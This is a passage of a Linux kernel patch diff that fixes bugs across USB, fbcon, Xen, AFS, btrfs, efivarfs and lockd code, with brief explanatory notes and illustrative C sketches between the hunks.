+ 		if (!list_empty(&cfg->string_list)) {
+ 			i = 0;
+diff --git a/drivers/usb/gadget/udc/core.c b/drivers/usb/gadget/udc/core.c
+index c40f2ecbe1b8c..0edd9e53fc5a1 100644
+--- a/drivers/usb/gadget/udc/core.c
++++ b/drivers/usb/gadget/udc/core.c
+@@ -525,6 +525,33 @@ int usb_gadget_wakeup(struct usb_gadget *gadget)
+ }
+ EXPORT_SYMBOL_GPL(usb_gadget_wakeup);
+ 
++/**
++ * usb_gadget_set_remote_wakeup - configures the device remote wakeup feature.
++ * @gadget:the device being configured for remote wakeup
++ * @set:value to be configured.
++ *
++ * Set @set to one to enable the remote wakeup feature, or to zero to disable it.
++ *
++ * returns zero on success, else negative errno.
++ */
++int usb_gadget_set_remote_wakeup(struct usb_gadget *gadget, int set)
++{
++	int ret = 0;
++
++	if (!gadget->ops->set_remote_wakeup) {
++		ret = -EOPNOTSUPP;
++		goto out;
++	}
++
++	ret = gadget->ops->set_remote_wakeup(gadget, set);
++
++out:
++	trace_usb_gadget_set_remote_wakeup(gadget, ret);
++
++	return ret;
++}
++EXPORT_SYMBOL_GPL(usb_gadget_set_remote_wakeup);
++
+ /**
+  * usb_gadget_set_selfpowered - sets the device selfpowered feature.
+  * @gadget:the device being declared as self-powered
+diff --git a/drivers/usb/gadget/udc/trace.h b/drivers/usb/gadget/udc/trace.h
+index abdbcb1bacb0b..a5ed26fbc2dad 100644
+--- a/drivers/usb/gadget/udc/trace.h
++++ b/drivers/usb/gadget/udc/trace.h
+@@ -91,6 +91,11 @@ DEFINE_EVENT(udc_log_gadget, usb_gadget_wakeup,
+ 	TP_ARGS(g, ret)
+ );
+ 
++DEFINE_EVENT(udc_log_gadget, usb_gadget_set_remote_wakeup,
++	TP_PROTO(struct usb_gadget *g, int ret),
++	TP_ARGS(g, ret)
++);
++
+ DEFINE_EVENT(udc_log_gadget, usb_gadget_set_selfpowered,
+ 	TP_PROTO(struct usb_gadget *g, int ret),
+ 	TP_ARGS(g, ret)
+diff --git a/drivers/usb/storage/scsiglue.c b/drivers/usb/storage/scsiglue.c
+index c54e9805da536..12cf9940e5b67 100644
+--- a/drivers/usb/storage/scsiglue.c
++++ b/drivers/usb/storage/scsiglue.c
+@@ -179,6 +179,13 @@ static int slave_configure(struct scsi_device *sdev)
+ 		 */
+ 		sdev->use_192_bytes_for_3f = 1;
+ 
++		/*
++		 * Some devices report generic values until the media has been
++		 * accessed. Force a READ(10) prior to querying device
++		 * characteristics.
++		 */
++		sdev->read_before_ms = 1;
++
+ 		/*
+ 		 * Some devices don't like MODE SENSE with page=0x3f,
+ 		 * which is the command used for checking if a device
+diff --git a/drivers/usb/storage/uas.c b/drivers/usb/storage/uas.c
+index de3836412bf32..ed22053b3252f 100644
+--- a/drivers/usb/storage/uas.c
++++ b/drivers/usb/storage/uas.c
+@@ -878,6 +878,13 @@ static int uas_slave_configure(struct scsi_device *sdev)
+ 	if (devinfo->flags & US_FL_CAPACITY_HEURISTICS)
+ 		sdev->guess_capacity = 1;
+ 
++	/*
++	 * Some devices report generic values until the media has been
++	 * accessed. Force a READ(10) prior to querying device
++	 * characteristics.
++	 */
++	sdev->read_before_ms = 1;
++
+ 	/*
+ 	 * Some devices don't like MODE SENSE with page=0x3f,
+ 	 * which is the command used for checking if a device
+diff --git a/drivers/video/fbdev/core/fbcon.c b/drivers/video/fbdev/core/fbcon.c
+index fa205be94a4b8..14498a0d13e0b 100644
+--- a/drivers/video/fbdev/core/fbcon.c
++++ b/drivers/video/fbdev/core/fbcon.c
+@@ -2397,11 +2397,9 @@ static int fbcon_do_set_font(struct vc_data *vc, int w, int h, int charcount,
+ 	struct fbcon_ops *ops = info->fbcon_par;
+ 	struct fbcon_display *p = &fb_display[vc->vc_num];
+ 	int resize, ret, old_userfont, old_width, old_height, old_charcount;
+-	char *old_data = NULL;
++	u8 *old_data = vc->vc_font.data;
+ 
+ 	resize = (w != vc->vc_font.width) || (h != vc->vc_font.height);
+-	if (p->userfont)
+-		old_data = vc->vc_font.data;
+ 	vc->vc_font.data = (void *)(p->fontdata = data);
+ 	old_userfont = p->userfont;
+ 	if ((p->userfont = userfont))
+@@ -2435,13 +2433,13 @@ static int fbcon_do_set_font(struct vc_data *vc, int w, int h, int charcount,
+ 		update_screen(vc);
+ 	}
+ 
+-	if (old_data && (--REFCOUNT(old_data) == 0))
++	if (old_userfont && (--REFCOUNT(old_data) == 0))
+ 		kfree(old_data - FONT_EXTRA_WORDS * sizeof(int));
+ 	return 0;
+ 
+ err_out:
+ 	p->fontdata = old_data;
+-	vc->vc_font.data = (void *)old_data;
++	vc->vc_font.data = old_data;
+ 
+ 	if (userfont) {
+ 		p->userfont = old_userfont;
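The leak fixed above stems from the console-font convention that userfont data is preceded by FONT_EXTRA_WORDS of bookkeeping, one word being a reference count, while built-in fonts carry no such prefix; keying the release on old_userfont (and restoring old_data unconditionally in the error path) keeps the two kinds apart. The prefix idiom, reduced to runnable userspace C with illustrative names:

    #include <stdlib.h>

    #define EXTRA_WORDS 1
    #define REFCOUNT(p) (((int *)(p))[-1])

    static void *payload_alloc(size_t len)
    {
            int *base = malloc(EXTRA_WORDS * sizeof(int) + len);

            if (!base)
                    return NULL;
            base[0] = 1;                    /* initial reference */
            return base + EXTRA_WORDS;      /* callers see only the payload */
    }

    static void payload_put(void *payload)
    {
            /* Valid only for payload_alloc()ed data - hence the userfont
             * check in the hunk above. */
            if (--REFCOUNT(payload) == 0)
                    free((int *)payload - EXTRA_WORDS);
    }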
+diff --git a/drivers/xen/events/events_base.c b/drivers/xen/events/events_base.c
+index 00f8e349921d4..96b96516c9806 100644
+--- a/drivers/xen/events/events_base.c
++++ b/drivers/xen/events/events_base.c
+@@ -937,8 +937,8 @@ static void shutdown_pirq(struct irq_data *data)
+ 		return;
+ 
+ 	do_mask(info, EVT_MASK_REASON_EXPLICIT);
+-	xen_evtchn_close(evtchn);
+ 	xen_irq_info_cleanup(info);
++	xen_evtchn_close(evtchn);
+ }
+ 
+ static void enable_pirq(struct irq_data *data)
+@@ -982,8 +982,6 @@ static void __unbind_from_irq(unsigned int irq)
+ 		unsigned int cpu = cpu_from_irq(irq);
+ 		struct xenbus_device *dev;
+ 
+-		xen_evtchn_close(evtchn);
+-
+ 		switch (type_from_irq(irq)) {
+ 		case IRQT_VIRQ:
+ 			per_cpu(virq_to_irq, cpu)[virq_from_irq(irq)] = -1;
+@@ -1001,6 +999,7 @@ static void __unbind_from_irq(unsigned int irq)
+ 		}
+ 
+ 		xen_irq_info_cleanup(info);
++		xen_evtchn_close(evtchn);
+ 	}
+ 
+ 	xen_free_irq(irq);
+diff --git a/fs/afs/dir.c b/fs/afs/dir.c
+index cf811b77ee671..6e2c967fae6fc 100644
+--- a/fs/afs/dir.c
++++ b/fs/afs/dir.c
+@@ -478,8 +478,10 @@ static int afs_dir_iterate_block(struct afs_vnode *dvnode,
+ 		    dire->u.name[0] == '.' &&
+ 		    ctx->actor != afs_lookup_filldir &&
+ 		    ctx->actor != afs_lookup_one_filldir &&
+-		    memcmp(dire->u.name, ".__afs", 6) == 0)
++		    memcmp(dire->u.name, ".__afs", 6) == 0) {
++			ctx->pos = blkoff + next * sizeof(union afs_xdr_dirent);
+ 			continue;
++		}
+ 
+ 		/* found the next entry */
+ 		if (!dir_emit(ctx, dire->u.name, nlen,
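The rule this hunk enforces: a directory iterator must advance ctx->pos past every entry it consumes, including ones it deliberately hides, because a caller whose buffer filled up restarts from ctx->pos and would otherwise spin on the hidden entry forever. Schematically, with a hypothetical entry type and helper:

    static int demo_emit_one(struct dir_context *ctx,
                             const struct demo_dirent *e, loff_t next_pos)
    {
            if (demo_entry_hidden(e)) {
                    ctx->pos = next_pos;  /* consumed, though never emitted */
                    return 0;
            }

            if (!dir_emit(ctx, e->name, e->namelen, e->ino, DT_UNKNOWN))
                    return -1;            /* buffer full; resume at ctx->pos */

            ctx->pos = next_pos;
            return 0;
    }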
+diff --git a/fs/btrfs/dev-replace.c b/fs/btrfs/dev-replace.c
+index 61e58066b5fd2..9c856a73d5333 100644
+--- a/fs/btrfs/dev-replace.c
++++ b/fs/btrfs/dev-replace.c
+@@ -740,6 +740,23 @@ static int btrfs_dev_replace_start(struct btrfs_fs_info *fs_info,
+ 	return ret;
+ }
+ 
++static int btrfs_check_replace_dev_names(struct btrfs_ioctl_dev_replace_args *args)
++{
++	if (args->start.srcdevid == 0) {
++		if (memchr(args->start.srcdev_name, 0,
++			   sizeof(args->start.srcdev_name)) == NULL)
++			return -ENAMETOOLONG;
++	} else {
++		args->start.srcdev_name[0] = 0;
++	}
++
++	if (memchr(args->start.tgtdev_name, 0,
++		   sizeof(args->start.tgtdev_name)) == NULL)
++	    return -ENAMETOOLONG;
++
++	return 0;
++}
++
+ int btrfs_dev_replace_by_ioctl(struct btrfs_fs_info *fs_info,
+ 			    struct btrfs_ioctl_dev_replace_args *args)
+ {
+@@ -752,10 +769,9 @@ int btrfs_dev_replace_by_ioctl(struct btrfs_fs_info *fs_info,
+ 	default:
+ 		return -EINVAL;
+ 	}
+-
+-	if ((args->start.srcdevid == 0 && args->start.srcdev_name[0] == '\0') ||
+-	    args->start.tgtdev_name[0] == '\0')
+-		return -EINVAL;
++	ret = btrfs_check_replace_dev_names(args);
++	if (ret < 0)
++		return ret;
+ 
+ 	ret = btrfs_dev_replace_start(fs_info, args->start.tgtdev_name,
+ 					args->start.srcdevid,
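memchr() is the right tool above because the two name fields arrive from the ioctl as fixed-size arrays with no termination guarantee, so even strlen() on them could run off the end. The check, reduced to runnable form:

    #include <errno.h>
    #include <string.h>

    #define NAME_LEN 64     /* stand-in for the ioctl's fixed field size */

    static int check_user_name(const char name[NAME_LEN])
    {
            /* A NUL must exist inside the buffer before the string is used. */
            if (memchr(name, 0, NAME_LEN) == NULL)
                    return -ENAMETOOLONG;
            return 0;
    }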
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index 0d1b05ded1e35..5756edb37c61e 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -1643,12 +1643,12 @@ void btrfs_free_fs_info(struct btrfs_fs_info *fs_info)
+  *
+  * @objectid:	root id
+  * @anon_dev:	preallocated anonymous block device number for new roots,
+- * 		pass 0 for new allocation.
++ *		pass NULL for a new allocation.
+  * @check_ref:	whether to check root item references, If true, return -ENOENT
+  *		for orphan roots
+  */
+ static struct btrfs_root *btrfs_get_root_ref(struct btrfs_fs_info *fs_info,
+-					     u64 objectid, dev_t anon_dev,
++					     u64 objectid, dev_t *anon_dev,
+ 					     bool check_ref)
+ {
+ 	struct btrfs_root *root;
+@@ -1668,9 +1668,9 @@ static struct btrfs_root *btrfs_get_root_ref(struct btrfs_fs_info *fs_info,
+ 		 * that common but still possible.  In that case, we just need
+ 		 * to free the anon_dev.
+ 		 */
+-		if (unlikely(anon_dev)) {
+-			free_anon_bdev(anon_dev);
+-			anon_dev = 0;
++		if (unlikely(anon_dev && *anon_dev)) {
++			free_anon_bdev(*anon_dev);
++			*anon_dev = 0;
+ 		}
+ 
+ 		if (check_ref && btrfs_root_refs(&root->root_item) == 0) {
+@@ -1692,7 +1692,7 @@ static struct btrfs_root *btrfs_get_root_ref(struct btrfs_fs_info *fs_info,
+ 		goto fail;
+ 	}
+ 
+-	ret = btrfs_init_fs_root(root, anon_dev);
++	ret = btrfs_init_fs_root(root, anon_dev ? *anon_dev : 0);
+ 	if (ret)
+ 		goto fail;
+ 
+@@ -1728,7 +1728,7 @@ static struct btrfs_root *btrfs_get_root_ref(struct btrfs_fs_info *fs_info,
+ 	 * root's anon_dev to 0 to avoid a double free, once by btrfs_put_root()
+ 	 * and once again by our caller.
+ 	 */
+-	if (anon_dev)
++	if (anon_dev && *anon_dev)
+ 		root->anon_dev = 0;
+ 	btrfs_put_root(root);
+ 	return ERR_PTR(ret);
+@@ -1744,7 +1744,7 @@ static struct btrfs_root *btrfs_get_root_ref(struct btrfs_fs_info *fs_info,
+ struct btrfs_root *btrfs_get_fs_root(struct btrfs_fs_info *fs_info,
+ 				     u64 objectid, bool check_ref)
+ {
+-	return btrfs_get_root_ref(fs_info, objectid, 0, check_ref);
++	return btrfs_get_root_ref(fs_info, objectid, NULL, check_ref);
+ }
+ 
+ /*
+@@ -1752,11 +1752,11 @@ struct btrfs_root *btrfs_get_fs_root(struct btrfs_fs_info *fs_info,
+  * the anonymous block device id
+  *
+  * @objectid:	tree objectid
+- * @anon_dev:	if zero, allocate a new anonymous block device or use the
+- *		parameter value
++ * @anon_dev:	if NULL, allocate a new anonymous block device or use the
++ *		parameter value if not NULL
+  */
+ struct btrfs_root *btrfs_get_new_fs_root(struct btrfs_fs_info *fs_info,
+-					 u64 objectid, dev_t anon_dev)
++					 u64 objectid, dev_t *anon_dev)
+ {
+ 	return btrfs_get_root_ref(fs_info, objectid, anon_dev, true);
+ }
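
Switching btrfs_get_root_ref() to take dev_t *anon_dev changes who owns the
preallocated anonymous device number: when the function finds an existing root
and frees the caller's preallocated id, it now zeroes the caller's copy
through the pointer, so the caller's error path cannot free the same id a
second time. A minimal sketch of that ownership-transfer idiom, with a
hypothetical release_id() resource:

#include <stdio.h>

static void release_id(unsigned int id)
{
	printf("released %u\n", id);
}

/*
 * If the callee disposes of the caller's preallocated id, it must zero
 * the caller's copy through the pointer; afterwards neither side can
 * release it twice.
 */
static void consume_or_discard(unsigned int *id, int need_new)
{
	if (!need_new && id && *id) {
		release_id(*id);
		*id = 0;		/* caller's copy is now inert */
	}
	/* on the need_new path the id would be handed to the new object */
}

int main(void)
{
	unsigned int preallocated = 42;

	consume_or_discard(&preallocated, 0);
	if (preallocated)		/* never true after the zeroing */
		release_id(preallocated);
	return 0;
}
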
+diff --git a/fs/btrfs/disk-io.h b/fs/btrfs/disk-io.h
+index 7322af63c0cc7..24bddca86e9c9 100644
+--- a/fs/btrfs/disk-io.h
++++ b/fs/btrfs/disk-io.h
+@@ -65,7 +65,7 @@ void btrfs_free_fs_roots(struct btrfs_fs_info *fs_info);
+ struct btrfs_root *btrfs_get_fs_root(struct btrfs_fs_info *fs_info,
+ 				     u64 objectid, bool check_ref);
+ struct btrfs_root *btrfs_get_new_fs_root(struct btrfs_fs_info *fs_info,
+-					 u64 objectid, dev_t anon_dev);
++					 u64 objectid, dev_t *anon_dev);
+ struct btrfs_root *btrfs_get_fs_root_commit_root(struct btrfs_fs_info *fs_info,
+ 						 struct btrfs_path *path,
+ 						 u64 objectid);
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index 196e222749ccd..64b37afb7c87f 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -708,7 +708,7 @@ static noinline int create_subvol(struct user_namespace *mnt_userns,
+ 	free_extent_buffer(leaf);
+ 	leaf = NULL;
+ 
+-	new_root = btrfs_get_new_fs_root(fs_info, objectid, anon_dev);
++	new_root = btrfs_get_new_fs_root(fs_info, objectid, &anon_dev);
+ 	if (IS_ERR(new_root)) {
+ 		ret = PTR_ERR(new_root);
+ 		btrfs_abort_transaction(trans, ret);
+diff --git a/fs/btrfs/send.c b/fs/btrfs/send.c
+index a75669972dc73..9f7ffd9ef6fd7 100644
+--- a/fs/btrfs/send.c
++++ b/fs/btrfs/send.c
+@@ -6462,11 +6462,20 @@ static int finish_inode_if_needed(struct send_ctx *sctx, int at_end)
+ 				if (ret)
+ 					goto out;
+ 			}
+-			if (sctx->cur_inode_last_extent <
+-			    sctx->cur_inode_size) {
+-				ret = send_hole(sctx, sctx->cur_inode_size);
+-				if (ret)
++			if (sctx->cur_inode_last_extent < sctx->cur_inode_size) {
++				ret = range_is_hole_in_parent(sctx,
++						      sctx->cur_inode_last_extent,
++						      sctx->cur_inode_size);
++				if (ret < 0) {
+ 					goto out;
++				} else if (ret == 0) {
++					ret = send_hole(sctx, sctx->cur_inode_size);
++					if (ret < 0)
++						goto out;
++				} else {
++					/* Range is already a hole, skip. */
++					ret = 0;
++				}
+ 			}
+ 		}
+ 		if (need_truncate) {
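
The send.c hunk avoids emitting data the receiver already has: before writing
a trailing hole for an incremental send, it asks whether the same range is
already a hole in the parent snapshot, in which case there is nothing to
transmit. The control flow, condensed with hypothetical helpers mirroring
range_is_hole_in_parent()'s <0/0/1 return convention:

extern int range_is_hole_in_parent(unsigned long long start,
				   unsigned long long end);
extern int emit_hole(unsigned long long end);

static int finish_tail(unsigned long long last_extent,
		       unsigned long long size)
{
	int ret = 0;

	if (last_extent < size) {
		ret = range_is_hole_in_parent(last_extent, size);
		if (ret < 0)
			return ret;		/* lookup failed */
		if (ret == 0)
			return emit_hole(size);	/* parent has data here */
		ret = 0;			/* already a hole: skip */
	}
	return ret;
}
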
+diff --git a/fs/btrfs/transaction.c b/fs/btrfs/transaction.c
+index 60db4c3b82fa1..b172091f42612 100644
+--- a/fs/btrfs/transaction.c
++++ b/fs/btrfs/transaction.c
+@@ -1809,7 +1809,7 @@ static noinline int create_pending_snapshot(struct btrfs_trans_handle *trans,
+ 	}
+ 
+ 	key.offset = (u64)-1;
+-	pending->snap = btrfs_get_new_fs_root(fs_info, objectid, pending->anon_dev);
++	pending->snap = btrfs_get_new_fs_root(fs_info, objectid, &pending->anon_dev);
+ 	if (IS_ERR(pending->snap)) {
+ 		ret = PTR_ERR(pending->snap);
+ 		pending->snap = NULL;
+diff --git a/fs/efivarfs/vars.c b/fs/efivarfs/vars.c
+index 9e4f47808bd5a..13bc606989557 100644
+--- a/fs/efivarfs/vars.c
++++ b/fs/efivarfs/vars.c
+@@ -372,7 +372,7 @@ static void dup_variable_bug(efi_char16_t *str16, efi_guid_t *vendor_guid,
+ int efivar_init(int (*func)(efi_char16_t *, efi_guid_t, unsigned long, void *),
+ 		void *data, bool duplicates, struct list_head *head)
+ {
+-	unsigned long variable_name_size = 1024;
++	unsigned long variable_name_size = 512;
+ 	efi_char16_t *variable_name;
+ 	efi_status_t status;
+ 	efi_guid_t vendor_guid;
+@@ -389,12 +389,13 @@ int efivar_init(int (*func)(efi_char16_t *, efi_guid_t, unsigned long, void *),
+ 		goto free;
+ 
+ 	/*
+-	 * Per EFI spec, the maximum storage allocated for both
+-	 * the variable name and variable data is 1024 bytes.
++	 * A small set of old UEFI implementations reject sizes
++	 * above a certain threshold, the lowest seen in the wild
++	 * is 512.
+ 	 */
+ 
+ 	do {
+-		variable_name_size = 1024;
++		variable_name_size = 512;
+ 
+ 		status = efivar_get_next_variable(&variable_name_size,
+ 						  variable_name,
+@@ -431,9 +432,13 @@ int efivar_init(int (*func)(efi_char16_t *, efi_guid_t, unsigned long, void *),
+ 			break;
+ 		case EFI_NOT_FOUND:
+ 			break;
++		case EFI_BUFFER_TOO_SMALL:
++			pr_warn("efivars: Variable name size exceeds maximum (%lu > 512)\n",
++				variable_name_size);
++			status = EFI_NOT_FOUND;
++			break;
+ 		default:
+-			printk(KERN_WARNING "efivars: get_next_variable: status=%lx\n",
+-				status);
++			pr_warn("efivars: get_next_variable: status=%lx\n", status);
+ 			status = EFI_NOT_FOUND;
+ 			break;
+ 		}
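
The efivarfs change shrinks the enumeration buffer from 1024 to 512 bytes and
turns EFI_BUFFER_TOO_SMALL into a warn-and-stop condition, because some old
firmware rejects GetNextVariableName() calls whose advertised size exceeds
what it tolerates, 512 being the smallest limit observed. Note that the size
must be re-armed on every iteration, since the service rewrites it. A
user-space sketch of the loop, with efi_get_next() standing in for the
runtime service and Linux-style positive status codes:

#include <stdint.h>
#include <stdio.h>

#define EFI_SUCCESS		0
#define EFI_BUFFER_TOO_SMALL	5
#define EFI_NOT_FOUND		14

extern int efi_get_next(unsigned long *name_size, uint16_t *name);

static void enumerate_variables(void)
{
	uint16_t name[512 / sizeof(uint16_t)] = { 0 };
	unsigned long size;
	int status;

	do {
		size = 512;		/* re-arm: the call rewrites it */
		status = efi_get_next(&size, name);
		switch (status) {
		case EFI_SUCCESS:
			/* record one variable name ... */
			break;
		case EFI_BUFFER_TOO_SMALL:
			fprintf(stderr, "name too long (%lu > 512)\n", size);
			status = EFI_NOT_FOUND;	/* stop, as the patch does */
			break;
		default:
			status = EFI_NOT_FOUND;
			break;
		}
	} while (status != EFI_NOT_FOUND);
}
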
+diff --git a/fs/exportfs/expfs.c b/fs/exportfs/expfs.c
+index c648a493faf23..3204bd33e4e8a 100644
+--- a/fs/exportfs/expfs.c
++++ b/fs/exportfs/expfs.c
+@@ -18,7 +18,7 @@
+ #include <linux/sched.h>
+ #include <linux/cred.h>
+ 
+-#define dprintk(fmt, args...) do{}while(0)
++#define dprintk(fmt, args...) pr_debug(fmt, ##args)
+ 
+ 
+ static int get_name(const struct path *path, char *name, struct dentry *child);
+@@ -132,8 +132,8 @@ static struct dentry *reconnect_one(struct vfsmount *mnt,
+ 	inode_unlock(dentry->d_inode);
+ 
+ 	if (IS_ERR(parent)) {
+-		dprintk("%s: get_parent of %ld failed, err %d\n",
+-			__func__, dentry->d_inode->i_ino, PTR_ERR(parent));
++		dprintk("get_parent of %lu failed, err %ld\n",
++			dentry->d_inode->i_ino, PTR_ERR(parent));
+ 		return parent;
+ 	}
+ 
+@@ -147,7 +147,7 @@ static struct dentry *reconnect_one(struct vfsmount *mnt,
+ 	dprintk("%s: found name: %s\n", __func__, nbuf);
+ 	tmp = lookup_one_unlocked(mnt_user_ns(mnt), nbuf, parent, strlen(nbuf));
+ 	if (IS_ERR(tmp)) {
+-		dprintk("%s: lookup failed: %d\n", __func__, PTR_ERR(tmp));
++		dprintk("lookup failed: %ld\n", PTR_ERR(tmp));
+ 		err = PTR_ERR(tmp);
+ 		goto out_err;
+ 	}
+diff --git a/fs/lockd/svc4proc.c b/fs/lockd/svc4proc.c
+index 284b019cb6529..b72023a6b4c16 100644
+--- a/fs/lockd/svc4proc.c
++++ b/fs/lockd/svc4proc.c
+@@ -52,6 +52,7 @@ nlm4svc_retrieve_args(struct svc_rqst *rqstp, struct nlm_args *argp,
+ 		*filp = file;
+ 
+ 		/* Set up the missing parts of the file_lock structure */
++		lock->fl.fl_flags = FL_POSIX;
+ 		lock->fl.fl_file  = file->f_file[mode];
+ 		lock->fl.fl_pid = current->tgid;
+ 		lock->fl.fl_start = (loff_t)lock->lock_start;
+diff --git a/fs/lockd/svclock.c b/fs/lockd/svclock.c
+index 9c1aa75441e1c..4e30f3c509701 100644
+--- a/fs/lockd/svclock.c
++++ b/fs/lockd/svclock.c
+@@ -659,11 +659,13 @@ nlmsvc_unlock(struct net *net, struct nlm_file *file, struct nlm_lock *lock)
+ 	nlmsvc_cancel_blocked(net, file, lock);
+ 
+ 	lock->fl.fl_type = F_UNLCK;
+-	if (file->f_file[O_RDONLY])
+-		error = vfs_lock_file(file->f_file[O_RDONLY], F_SETLK,
++	lock->fl.fl_file = file->f_file[O_RDONLY];
++	if (lock->fl.fl_file)
++		error = vfs_lock_file(lock->fl.fl_file, F_SETLK,
+ 					&lock->fl, NULL);
+-	if (file->f_file[O_WRONLY])
+-		error = vfs_lock_file(file->f_file[O_WRONLY], F_SETLK,
++	lock->fl.fl_file = file->f_file[O_WRONLY];
++	if (lock->fl.fl_file)
++		error |= vfs_lock_file(lock->fl.fl_file, F_SETLK,
+ 					&lock->fl, NULL);
+ 
+ 	return (error < 0)? nlm_lck_denied_nolocks : nlm_granted;
+@@ -697,9 +699,10 @@ nlmsvc_cancel_blocked(struct net *net, struct nlm_file *file, struct nlm_lock *l
+ 	block = nlmsvc_lookup_block(file, lock);
+ 	mutex_unlock(&file->f_mutex);
+ 	if (block != NULL) {
+-		mode = lock_to_openmode(&lock->fl);
+-		vfs_cancel_lock(block->b_file->f_file[mode],
+-				&block->b_call->a_args.lock.fl);
++		struct file_lock *fl = &block->b_call->a_args.lock.fl;
++
++		mode = lock_to_openmode(fl);
++		vfs_cancel_lock(block->b_file->f_file[mode], fl);
+ 		status = nlmsvc_unlink_block(block);
+ 		nlmsvc_release_block(block);
+ 	}
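
The nlmsvc_unlock() hunk fixes two related slips: the file_lock must point at
the struct file actually being unlocked before each vfs_lock_file() call, and
the second call's result must be OR-ed in so a failure on the read-side unlock
is not overwritten by a success on the write side (bitwise OR keeps any
negative errno negative). The shape of the fix, with a hypothetical
unlock_one() returning 0 or a -errno:

struct lockreq {
	void *file;
};

extern int unlock_one(void *file, struct lockreq *req);

static int unlock_both(void *rd_file, void *wr_file, struct lockreq *req)
{
	int error = 0;

	req->file = rd_file;
	if (req->file)
		error = unlock_one(req->file, req);
	req->file = wr_file;
	if (req->file)
		error |= unlock_one(req->file, req);	/* don't mask */

	return error < 0 ? -1 : 0;
}
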
+diff --git a/fs/lockd/svcproc.c b/fs/lockd/svcproc.c
+index e35c05e278061..32784f508c810 100644
+--- a/fs/lockd/svcproc.c
++++ b/fs/lockd/svcproc.c
+@@ -77,6 +77,7 @@ nlmsvc_retrieve_args(struct svc_rqst *rqstp, struct nlm_args *argp,
+ 
+ 		/* Set up the missing parts of the file_lock structure */
+ 		mode = lock_to_openmode(&lock->fl);
++		lock->fl.fl_flags = FL_POSIX;
+ 		lock->fl.fl_file  = file->f_file[mode];
+ 		lock->fl.fl_pid = current->tgid;
+ 		lock->fl.fl_lmops = &nlmsvc_lock_operations;
+diff --git a/fs/lockd/svcsubs.c b/fs/lockd/svcsubs.c
+index 3515f17eaf3fb..e3b6229e7ae5c 100644
+--- a/fs/lockd/svcsubs.c
++++ b/fs/lockd/svcsubs.c
+@@ -210,7 +210,7 @@ nlm_traverse_locks(struct nlm_host *host, struct nlm_file *file,
+ {
+ 	struct inode	 *inode = nlmsvc_file_inode(file);
+ 	struct file_lock *fl;
+-	struct file_lock_context *flctx = inode->i_flctx;
++	struct file_lock_context *flctx = locks_inode_context(inode);
+ 	struct nlm_host	 *lockhost;
+ 
+ 	if (!flctx || list_empty_careful(&flctx->flc_posix))
+@@ -265,7 +265,7 @@ nlm_file_inuse(struct nlm_file *file)
+ {
+ 	struct inode	 *inode = nlmsvc_file_inode(file);
+ 	struct file_lock *fl;
+-	struct file_lock_context *flctx = inode->i_flctx;
++	struct file_lock_context *flctx = locks_inode_context(inode);
+ 
+ 	if (file->f_count || !list_empty(&file->f_blocks) || file->f_shares)
+ 		return 1;
+diff --git a/fs/locks.c b/fs/locks.c
+index 1047ab2b15e96..7d0918b8fe5d6 100644
+--- a/fs/locks.c
++++ b/fs/locks.c
+@@ -175,7 +175,7 @@ locks_get_lock_context(struct inode *inode, int type)
+ 	struct file_lock_context *ctx;
+ 
+ 	/* paired with cmpxchg() below */
+-	ctx = smp_load_acquire(&inode->i_flctx);
++	ctx = locks_inode_context(inode);
+ 	if (likely(ctx) || type == F_UNLCK)
+ 		goto out;
+ 
+@@ -194,7 +194,7 @@ locks_get_lock_context(struct inode *inode, int type)
+ 	 */
+ 	if (cmpxchg(&inode->i_flctx, NULL, ctx)) {
+ 		kmem_cache_free(flctx_cache, ctx);
+-		ctx = smp_load_acquire(&inode->i_flctx);
++		ctx = locks_inode_context(inode);
+ 	}
+ out:
+ 	trace_locks_get_lock_context(inode, type, ctx);
+@@ -247,7 +247,7 @@ locks_check_ctx_file_list(struct file *filp, struct list_head *list,
+ void
+ locks_free_lock_context(struct inode *inode)
+ {
+-	struct file_lock_context *ctx = inode->i_flctx;
++	struct file_lock_context *ctx = locks_inode_context(inode);
+ 
+ 	if (unlikely(ctx)) {
+ 		locks_check_ctx_lists(inode);
+@@ -891,7 +891,7 @@ posix_test_lock(struct file *filp, struct file_lock *fl)
+ 	void *owner;
+ 	void (*func)(void);
+ 
+-	ctx = smp_load_acquire(&inode->i_flctx);
++	ctx = locks_inode_context(inode);
+ 	if (!ctx || list_empty_careful(&ctx->flc_posix)) {
+ 		fl->fl_type = F_UNLCK;
+ 		return;
+@@ -1483,7 +1483,7 @@ int __break_lease(struct inode *inode, unsigned int mode, unsigned int type)
+ 	new_fl->fl_flags = type;
+ 
+ 	/* typically we will check that ctx is non-NULL before calling */
+-	ctx = smp_load_acquire(&inode->i_flctx);
++	ctx = locks_inode_context(inode);
+ 	if (!ctx) {
+ 		WARN_ON_ONCE(1);
+ 		goto free_lock;
+@@ -1588,7 +1588,7 @@ void lease_get_mtime(struct inode *inode, struct timespec64 *time)
+ 	struct file_lock_context *ctx;
+ 	struct file_lock *fl;
+ 
+-	ctx = smp_load_acquire(&inode->i_flctx);
++	ctx = locks_inode_context(inode);
+ 	if (ctx && !list_empty_careful(&ctx->flc_lease)) {
+ 		spin_lock(&ctx->flc_lock);
+ 		fl = list_first_entry_or_null(&ctx->flc_lease,
+@@ -1634,7 +1634,7 @@ int fcntl_getlease(struct file *filp)
+ 	int type = F_UNLCK;
+ 	LIST_HEAD(dispose);
+ 
+-	ctx = smp_load_acquire(&inode->i_flctx);
++	ctx = locks_inode_context(inode);
+ 	if (ctx && !list_empty_careful(&ctx->flc_lease)) {
+ 		percpu_down_read(&file_rwsem);
+ 		spin_lock(&ctx->flc_lock);
+@@ -1823,7 +1823,7 @@ static int generic_delete_lease(struct file *filp, void *owner)
+ 	struct file_lock_context *ctx;
+ 	LIST_HEAD(dispose);
+ 
+-	ctx = smp_load_acquire(&inode->i_flctx);
++	ctx = locks_inode_context(inode);
+ 	if (!ctx) {
+ 		trace_generic_delete_lease(inode, NULL);
+ 		return error;
+@@ -2562,7 +2562,7 @@ void locks_remove_posix(struct file *filp, fl_owner_t owner)
+ 	 * posix_lock_file().  Another process could be setting a lock on this
+ 	 * file at the same time, but we wouldn't remove that lock anyway.
+ 	 */
+-	ctx =  smp_load_acquire(&inode->i_flctx);
++	ctx = locks_inode_context(inode);
+ 	if (!ctx || list_empty(&ctx->flc_posix))
+ 		return;
+ 
+@@ -2635,7 +2635,7 @@ void locks_remove_file(struct file *filp)
+ {
